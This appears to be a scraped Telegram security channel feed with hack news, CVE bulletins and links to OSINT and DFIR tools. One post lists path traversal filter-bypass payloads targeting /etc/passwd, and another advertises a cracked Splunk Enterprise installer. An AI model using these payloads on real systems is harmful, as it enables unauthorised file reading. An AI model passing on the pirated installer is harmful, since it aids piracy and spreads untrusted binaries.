Фотография
нажмите — покажем
нажмите — покажем
Фотография
нажмите — покажем
нажмите — покажем
The Lazarus Group is being named as behind the Bitget hack.
Bitget reportedly suffered a hack resulting in more than $170 million in losses.
Just linked this hack to the AFX hack, which stole $24M in July and was specifically attributed to TraderTraitor.
The stolen XRP from Bitget was bridged and can be directly linked to the funds stolen in the AFX hack.
3 · 504 · ОтветThe Lazarus Group is being named as behind the Bitget hack.
Bitget reportedly suffered a hack resulting in more than $170 million in losses.
Just linked this hack to the AFX hack, which stole $24M in July and was specifically attributed to TraderTraitor.
The stolen XRP from Bitget was bridged and
Фотография
нажмите — покажем
нажмите — покажем
CEO of Bitget
1 · 501 · Фотография
нажмите — покажем
нажмите — покажем
10 daqiqa oldin Database World Roc nomi bilan mashhur bo'lgan Chat Telegram tomonidan bloklandi. Nega mashhur chunki uyerda barcha Forumlarning Creatorlari bor edi! Endi uni yana qayta ochishsa qanday topib olishga bosh qotgan )
1 · 444 · Фотография
нажмите — покажем
нажмите — покажем
Фотография
нажмите — покажем
нажмите — покажем
Ответ10 daqiqa oldin Database World Roc nomi bilan mashhur bo'lgan Chat Telegram tomonidan bloklandi. Nega mashhur chunki uyerda barcha Forumlarning Creatorlari bor edi! Endi uni yana qayta ochishsa qanday topib olishga bosh qotgan )
Eng katta boshqalariga yo'l ochdaigan resource edi man uchun ha mayli tanish bilish qilamiz qolganini )
574 · SecList for CyberStudents
Фотография
нажмите — покажем
нажмите — покажем
‼️ Citrix has released a security bulletin regarding zero-day attacks targeting Citrix NetScaler ADC and Citrix NetScaler Gateway.
More info: https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX697096
CVEs: CVE-2026-88771, CVE-2026-88772, CVE-2026-88773, CVE-2026-88774, CVE-2026-88775, CVE-2026-88776, CVE-2026-88777, and CVE-2026-88778
2 · 466 · Ссылка
нажмите — покажем
нажмите — покажем
‼️ CVE-2026-14281: Unauthenticated Privilege Escalation Vulnerability in the WAWP WordPress Plugin
CVE Published: September 24, 2026
PoC Published: September 25, 2026
GitHub PoC: https://github.com/murrez/CVE-2026-14281
5 · 522 · Ссылка
нажмите — покажем
нажмите — покажем
#tools
#DFIR
DFIR Companion v.038.0
https://github.com/hasamba/DFIR-Companion
// AI-assisted DFIR triage. Turns investigation screenshots and imported artifacts into a forensic timeline, findings, IOCs, an asset-IoC graph
4 · 526 · SecList for CyberStudents
Фотография
нажмите — покажем
нажмите — покажем
OSGINT: Retrieve public information about a GitHub username or email address
GitHub: https://github.com/hippiiee/osgint
9 · 482 · Фотография
нажмите — покажем
нажмите — покажем
citrixInspector: Passively identify Citrix ADC / NetScaler ADC & Gateway builds and check for known vulnerabilities, including CVE-2023-3519, CitrixBleed 2/3, CVE-2026-8452, and KEV-listed CVE-2026-88771/88772.
GitHub: https://github.com/securekomodo/citrixInspector
6 · 470 · Фотография
нажмите — покажем
нажмите — покажем
CVE-2026-88771: Detection Artifact Generator for Citrix NetScaler
GitHub: https://github.com/watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88771
3 · 512 · Фотография
нажмите — покажем
1 · 542 · нажмите — покажем
Ссылка
нажмите — покажем
нажмите — покажем
Telegram Deletion Tool Update
https://git.darkwebinformer.com/DarkWebInformer/telegram_delete
Added the ability to delete channel messages from a specific date onward.
• Use a simple YYYY-MM-DD date
• Exact UTC timestamps are also supported
• Messages older than the selected date are left untouched
• Running without a date keeps the original delete-all behavior
9 · 565 · SecList for CyberStudents
Фотография
нажмите — покажем
нажмите — покажем
TorCrawl
#darknet #OSINT
TorCrawl — это скрипт на Python, предназначенный для анонимного обхода и извлечения содержимого веб-страниц, включая скрытые .onion-ресурсы, через сеть TOR. Инструмент сочетает простоту использования с функциями приватности, обеспечивая сбор данных без раскрытия реального IP-адреса.
Ссылка на GitHub
11 · 545 · SecList for CyberStudents
Файл
Splunk_Enterprise_10.4.4 DVT V0dkaSh0ts · 1060.9 МБ · нажмите — покажем
Splunk_Enterprise_10.4.4 DVT V0dkaSh0ts · 1060.9 МБ · нажмите — покажем
This is from us. Windows Installer but AnyOS Crack. You know where to get it! Don't bother me! Enjoy! All hail Pwn3rzs! Greetings from DVT as well.
5 · 435 · SecList for CyberStudents
Фотография
нажмите — покажем
нажмите — покажем
NASA FIRMS (Fire Information for Resource Management System)
#OSINT
Система предоставляет доступ к данным о лесных пожарах в режиме, близком к реальному времени. NASA FIRMS использует спутниковые снимки с приборов MODIS и VIIRS для обнаружения активных пожаров — готовые к анализу данные и онлайн-карты.
Ссылка на сайт
2 · 429 · Обход Path Traversal
Null Byte Injection
../../../etc/./passwd%00.png
Удаление ../
..././..././..././e../tc..//pas../swd
Многоэтапное декодирование
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32F/passwd
Добавление для усечения по длине, 4096 байт
../../../etc/./passwd/././././././
4 · 426 · SecList for CyberStudents
Фотография
нажмите — покажем
нажмите — покажем
⚠️ DIQQAT! ModSecurity’dagi yangi zaifliklar WAF himoyasini chetlab o‘tishga imkon berishi mumkin!
🛡 OWASP ModSecurity — veb-ilovalarni turli kiberhujumlardan himoya qilish uchun qo‘llaniladigan ochiq kodli Web Application Firewall (WAF) vositasidir. U veb-ilovalarga kelayotgan HTTP so‘rovlarini tekshiradi, shubhali yoki zararli ma’lumotlarni aniqlaydi va xavfsizlik qoidalariga mos kelmaydigan so‘rovlarni bloklaydi. ModSecurity Apache HTTP Server, Nginx va Microsoft IIS kabi veb-serverlar bilan birgalikda ishlatiladi.
💻 2026-yil 30-sentabr kuni ModSecurity’da bir nechta yangi xavfsizlik zaifliklari aniqlangani va ular bo‘yicha tegishli tavsiyalar e’lon qilingani ma’lum qilindi. Ayrim zaifliklar hujumchilarga WAF tomonidan amalga oshiriladigan tekshiruvlarni chetlab o‘tish va zararli so‘rovlarni himoyalangan veb-ilovaga yetkazish imkonini berishi mumkin.
🚫 Bu holat ModSecurity’dan foydalanayotgan tashkilotlar uchun muhim ahamiyatga ega. Chunki WAF qoidalari zararli so‘rovlarni aniqlashda asosiy himoya vositalaridan biri hisoblanadi. Agar WAF ma’lumotni noto‘g‘ri qayta ishlasa yoki uni ilovadan boshqacha talqin qilsa, ayrim zararli so‘rovlar aniqlanmay qolishi mumkin.
📱 Batafsil
🚀 Kiberxavfsizlik markazining UZCERT xizmati
1 · 380 · Фотография
нажмите — покажем
нажмите — покажем
🚨 Dread hacked message on HugBunter's profile redirecting to Dread2.
246 · Ответ🚨 Dread hacked message on HugBunter's profile redirecting to Dread2.
Фотография
нажмите — покажем
242 · нажмите — покажем